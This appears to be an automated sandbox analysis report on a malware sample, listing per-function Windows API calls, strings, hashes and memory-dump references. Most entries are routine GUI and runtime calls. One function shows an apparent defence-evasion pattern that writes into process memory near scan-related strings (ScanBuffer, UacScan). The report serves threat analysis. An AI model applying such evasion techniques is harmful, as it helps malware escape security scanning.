                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3867285559-0
                                                                                                                                  • Opcode ID: 9a3220e39971d19614e7bb4e7e390bd62e23ec9d7e65e37c842b8faa60e2dab3
                                                                                                                                  • Instruction ID: 51a89071a64f963f40a3a68912739c4b5552423f5f89009c6ede6631a27c2153
                                                                                                                                  • Opcode Fuzzy Hash: 9a3220e39971d19614e7bb4e7e390bd62e23ec9d7e65e37c842b8faa60e2dab3
                                                                                                                                  • Instruction Fuzzy Hash: 8C414935B00204AFEB10EBA9CD84BAEB7F8AB48704F5044A9B919DB291DB75ED05CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • IsWindowUnicode.USER32(?), ref: 04216E9E
                                                                                                                                  • SetWindowLongW.USER32(?,000000FC,?), ref: 04216EB9
                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 04216EC4
                                                                                                                                  • GetWindowLongW.USER32(?,000000F4), ref: 04216ED6
                                                                                                                                  • SetWindowLongW.USER32(?,000000F4,?), ref: 04216EE9
                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,?), ref: 04216F02
                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 04216F0D
                                                                                                                                  • GetWindowLongA.USER32(?,000000F4), ref: 04216F1F
                                                                                                                                  • SetWindowLongA.USER32(?,000000F4,?), ref: 04216F32
                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 04216F49
                                                                                                                                  • SetPropA.USER32(?,00000000,00000000), ref: 04216F60
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long$Prop$Unicode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1693715928-0
                                                                                                                                  • Opcode ID: 75e74c24301cab2c37f9ce728e31e530f2c24b6ebddadfa3fc5c1e0d98c10a16
                                                                                                                                  • Instruction ID: 7a5fc0707744bb435f0484774a56018849e8aa418b5ecd104cd020b9b3b35b66
                                                                                                                                  • Opcode Fuzzy Hash: 75e74c24301cab2c37f9ce728e31e530f2c24b6ebddadfa3fc5c1e0d98c10a16
                                                                                                                                  • Instruction Fuzzy Hash: 6C319B79604249BBEF14DFADD884EBA3BECEB09264F144650BA24CB2D1D739F940DB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,UacScan,0427A350,0423B464,OpenSession,0427A350,0423B464,ScanBuffer,0427A350,0423B464,00000000,0423B44C), ref: 0423AF47
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 0423AF4D
                                                                                                                                    • Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
                                                                                                                                    • Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
                                                                                                                                    • Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
                                                                                                                                    • Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
                                                                                                                                    • Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
                                                                                                                                    • Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
                                                                                                                                    • Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressCurrentHandleLibraryMemoryModuleProcProcessVirtual$FreeLoadProtectWrite
                                                                                                                                  • String ID: C:\Windows\System32\ntdll.dll$NtWriteVirtualMemory$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                                  • API String ID: 327143009-4174081549
                                                                                                                                  • Opcode ID: 442fdd677a80759c836c3176855b378f5cac81dee7b2f4975acb8dfb27fe738f
                                                                                                                                  • Instruction ID: 20c4bf6e486f6bc73bd15d4b95c721519b2f3990adb0c2c292c5495256bfbab4
                                                                                                                                  • Opcode Fuzzy Hash: 442fdd677a80759c836c3176855b378f5cac81dee7b2f4975acb8dfb27fe738f
                                                                                                                                  • Instruction Fuzzy Hash: 8BF12139B10519DBEB04EBA5DCD0BEEB7B9EF88205F1181A1D204EB215DB30BD468F55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RectVisible.GDI32(00000000,?), ref: 0421FBA4
                                                                                                                                  • SaveDC.GDI32(00000000), ref: 0421FBC7
                                                                                                                                  • IntersectClipRect.GDI32(00000000,00000000,00000000,?,?), ref: 0421FC07
                                                                                                                                  • RestoreDC.GDI32(00000000,00000000), ref: 0421FC33
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$ClipIntersectRestoreSaveVisible
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1976014923-0
                                                                                                                                  • Opcode ID: eac43377e8b3259acab4f830902c768de5c801b3ce01cdc8fad91acd1af14625
                                                                                                                                  • Instruction ID: a0b7ab318c0ac207a90d2f6fd3be615ff084eb6d06ad45aac1eb61bd9e17d87f
                                                                                                                                  • Opcode Fuzzy Hash: eac43377e8b3259acab4f830902c768de5c801b3ce01cdc8fad91acd1af14625
                                                                                                                                  • Instruction Fuzzy Hash: C5912774B102499FDB04DFA9C984FAEBBF8BF18304F4540A5EA54EB2A2D735E941CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 0422F143
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 0422F161
                                                                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0422F16E
                                                                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0422F17B
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0422F188
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0422F195
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0422F1A2
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0422F1AF
                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0422F1CD
                                                                                                                                  • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 0422F1E9
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$Delete$EnableItem$System
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3985193851-0
                                                                                                                                  • Opcode ID: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                                                  • Instruction ID: 9b67870745399de94e05c8be75dbcf896ba737848814143041e61e9e5cd3afe8
                                                                                                                                  • Opcode Fuzzy Hash: 23241799ec2803eb5caea310ee41a3751ad6447c0d39fecbfe55116c129a1b39
                                                                                                                                  • Instruction Fuzzy Hash: A7210974394715BAF720DB38CECDF697AD95B24B08F8640A0B6487F6D2C7A4BA409714
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  • The sizes of unexpected leaked medium and large blocks are: , xrefs: 041E28E5
                                                                                                                                  • , xrefs: 041E28B0
                                                                                                                                  • Unexpected Memory Leak, xrefs: 041E295C
                                                                                                                                  • An unexpected memory leak has occurred. , xrefs: 041E272C
                                                                                                                                  • The unexpected small block leaks are:, xrefs: 041E27A3
                                                                                                                                  • bytes: , xrefs: 041E27F9
                                                                                                                                  • 7, xrefs: 041E273D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                  • API String ID: 0-2723507874
                                                                                                                                  • Opcode ID: fe272ac562e106763710f9240a1288f026b85bd75e3afc9a5a0115542cdfde1a
                                                                                                                                  • Instruction ID: 4306f889782ae9672a0e71a4d93e16a36e31392a6505d093d8e2fc079f703367
                                                                                                                                  • Opcode Fuzzy Hash: fe272ac562e106763710f9240a1288f026b85bd75e3afc9a5a0115542cdfde1a
                                                                                                                                  • Instruction Fuzzy Hash: E871F538B046688BEF219B2ECCD4BE8B7F9EB09704F1040E5D149EB242DB75A9C5CB51
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421A1AB
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421A1C5
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421A1F3
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421A209
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421A241
                                                                                                                                  • MulDiv.KERNEL32(?,?,?), ref: 0421A259
                                                                                                                                    • Part of subcall function 042024FC: MulDiv.KERNEL32(00000000,00000048,?), ref: 0420250D
                                                                                                                                  • MulDiv.KERNEL32(?), ref: 0421A2B0
                                                                                                                                  • MulDiv.KERNEL32(?), ref: 0421A2DA
                                                                                                                                  • MulDiv.KERNEL32(00000000), ref: 0421A300
                                                                                                                                    • Part of subcall function 04202518: MulDiv.KERNEL32(00000000,?,00000048), ref: 04202525
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 083b4522f788f2605366d647306a04d40284cc769ce5b21b8360dc04612198d4
                                                                                                                                  • Instruction ID: 14683ab75d666c74ccd943ba10a63dcb5f4c82855876ad76f2580e7088b19472
                                                                                                                                  • Opcode Fuzzy Hash: 083b4522f788f2605366d647306a04d40284cc769ce5b21b8360dc04612198d4
                                                                                                                                  • Instruction Fuzzy Hash: C0514D70719751AFD320DA69C884B6AB7F9AF65304F44481DF9D5C7262DA7AF840CB20
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 041FE97C: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 041FE99A
                                                                                                                                  • GetClassInfoA.USER32(041E0000,04232730,?), ref: 04232AF3
                                                                                                                                  • RegisterClassA.USER32(0424B650), ref: 04232B0B
                                                                                                                                    • Part of subcall function 041E669C: LoadStringA.USER32(00000000,0000FFF3,?,00001000), ref: 041E66CE
                                                                                                                                  • SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 04232BA7
                                                                                                                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 04232BC9
                                                                                                                                  • SetClassLongA.USER32(0000000E,000000F2,00000000), ref: 04232BDC
                                                                                                                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232BE7
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232BF6
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232C03
                                                                                                                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,042299E0), ref: 04232C1A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2103932818-0
                                                                                                                                  • Opcode ID: d81b37dc43fbac58694489ae099fcfdcee3ebf10b58c3c5b30045dc5a580616d
                                                                                                                                  • Instruction ID: 99cf3ce58b799fc116227480d07a1eb27823c170274677077fe16c0cc6ff88f0
                                                                                                                                  • Opcode Fuzzy Hash: d81b37dc43fbac58694489ae099fcfdcee3ebf10b58c3c5b30045dc5a580616d
                                                                                                                                  • Instruction Fuzzy Hash: CF413BB8B10641ABF710EF69EDC5F6937A9EB19704F4144A0FA00EB292D775BC408B24
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDesktopWindow.USER32 ref: 0421B12B
                                                                                                                                  • GetDCEx.USER32(?,00000000,00000402), ref: 0421B13E
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0421B161
                                                                                                                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0421B187
                                                                                                                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0421B1A9
                                                                                                                                  • PatBlt.GDI32(?,?,?,?,00000000,005A0049), ref: 0421B1C8
                                                                                                                                  • PatBlt.GDI32(?,?,?,00000000,?,005A0049), ref: 0421B1E2
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 0421B1EF
                                                                                                                                  • ReleaseDC.USER32(?,?), ref: 0421B209
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ObjectSelect$DesktopReleaseWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1187665388-0
                                                                                                                                  • Opcode ID: 1082657284b2601d93558fea930a3bc10584190b59f474b39da3ef2ed73ef03b
                                                                                                                                  • Instruction ID: 979fb7048f3a1a913f2a2d25e02dbb9f0e8099ef96cf5f6822365b61d70294db
                                                                                                                                  • Opcode Fuzzy Hash: 1082657284b2601d93558fea930a3bc10584190b59f474b39da3ef2ed73ef03b
                                                                                                                                  • Instruction Fuzzy Hash: 803107B6E00619AFEB01DEEDCC89DAFBBBCFF19604B804464B554E7244C675AD048BA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetThreadLocale.KERNEL32(00000000,041ED297,?,?,00000000,00000000), ref: 041ED002
                                                                                                                                    • Part of subcall function 041EB8C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Locale$InfoThread
                                                                                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                  • API String ID: 4232894706-2493093252
                                                                                                                                  • Opcode ID: 5eed3869060e5c6c7b9b3a56d157afa1347c70ad0c0e9392bae11cdab910152f
                                                                                                                                  • Instruction ID: 7711b1c10234cb50c50d6dd432b65a01bfbddcdf37258b138d9149fdc3b1fad6
                                                                                                                                  • Opcode Fuzzy Hash: 5eed3869060e5c6c7b9b3a56d157afa1347c70ad0c0e9392bae11cdab910152f
                                                                                                                                  • Instruction Fuzzy Hash: 77616578B04A4A5BFB04EBE6E8C0ABE77A5DF88304F149435D100AB345CB39FD459B55
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetClassInfoA.USER32(?,?,?), ref: 0421E650
                                                                                                                                  • UnregisterClassA.USER32(?,?), ref: 0421E678
                                                                                                                                  • RegisterClassA.USER32(?), ref: 0421E68E
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 0421E6CA
                                                                                                                                  • GetWindowLongA.USER32(00000000,000000F4), ref: 0421E6DF
                                                                                                                                  • SetWindowLongA.USER32(00000000,000000F4,00000000), ref: 0421E6F2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ClassLongWindow$InfoRegisterUnregister
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 717780171-2766056989
                                                                                                                                  • Opcode ID: 0ed31c20965d8965650dccd09bce1f56390bcb910171ee1da1063ad75bffcb31
                                                                                                                                  • Instruction ID: d952b4c66ca16ad9bb2b40db20d8d960c12583cd80a18e1d3d62532bbec7805b
                                                                                                                                  • Opcode Fuzzy Hash: 0ed31c20965d8965650dccd09bce1f56390bcb910171ee1da1063ad75bffcb31
                                                                                                                                  • Instruction Fuzzy Hash: 7751CF34B107549FEB20EB69CC84BAEB7F9AF15308F4045A9E819D72A1DB30B945CB11
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetMonitorInfoA.USER32(?,?), ref: 0420B001
                                                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0420B028
                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 0420B03D
                                                                                                                                  • GetSystemMetrics.USER32(00000001), ref: 0420B048
                                                                                                                                  • lstrcpyA.KERNEL32(?,DISPLAY), ref: 0420B072
                                                                                                                                    • Part of subcall function 0420ACA4: GetProcAddress.KERNEL32(76BE0000,00000000), ref: 0420AD23
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                                                                                  • String ID: DISPLAY$GetMonitorInfo
                                                                                                                                  • API String ID: 1539801207-1633989206
                                                                                                                                  • Opcode ID: 0669ed894894ba3d530144cac2e252387adb42fdc94dfd8b95d7ae60fd5c27d8
                                                                                                                                  • Instruction ID: 934c8cd05ea5e695bf084c2c677de7eb9869579c9a38a8536bf9290d7895f5bb
                                                                                                                                  • Opcode Fuzzy Hash: 0669ed894894ba3d530144cac2e252387adb42fdc94dfd8b95d7ae60fd5c27d8
                                                                                                                                  • Instruction Fuzzy Hash: 3A11DA31B50711AFE730CFA49C44767BBEAEB05360F008529ED6597681D7B4B844C791
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?,042797C8,?,?,0424A7AC,041E68FD,04249751), ref: 041E4641
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?,042797C8,?,?,0424A7AC,041E68FD,04249751), ref: 041E4647
                                                                                                                                  • GetStdHandle.KERNEL32(000000F5,041E4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?,042797C8), ref: 041E465C
                                                                                                                                  • WriteFile.KERNEL32(00000000,000000F5,041E4690,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,041E46CF,?,?), ref: 041E4662
                                                                                                                                  • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 041E4680
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileHandleWrite$Message
                                                                                                                                  • String ID: Error$Runtime error at 00000000
                                                                                                                                  • API String ID: 1570097196-2970929446
                                                                                                                                  • Opcode ID: 53c1067fd490e96084079633d636e787aabc3adf145f3dc5e6715612ce78d5a8
                                                                                                                                  • Instruction ID: 14847de7b80997e4f2013933c7598777d94e5566f6b1979cb640da684d95802b
                                                                                                                                  • Opcode Fuzzy Hash: 53c1067fd490e96084079633d636e787aabc3adf145f3dc5e6715612ce78d5a8
                                                                                                                                  • Instruction Fuzzy Hash: 1BF09658B94780F5F72066556C89FFD2768D7C8F28F244654B320940C18BB878C4CF21
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%
